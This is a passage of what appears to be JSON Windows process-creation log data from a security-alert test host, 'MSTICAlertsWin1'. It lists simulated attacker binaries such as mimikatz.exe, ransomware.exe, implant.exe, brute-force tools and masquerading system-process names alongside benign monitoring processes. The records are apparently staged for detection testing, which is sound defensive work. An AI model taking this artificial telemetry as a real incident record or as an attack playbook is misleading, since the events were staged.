Win1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\42424.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\1234.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.ex\\ne\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service 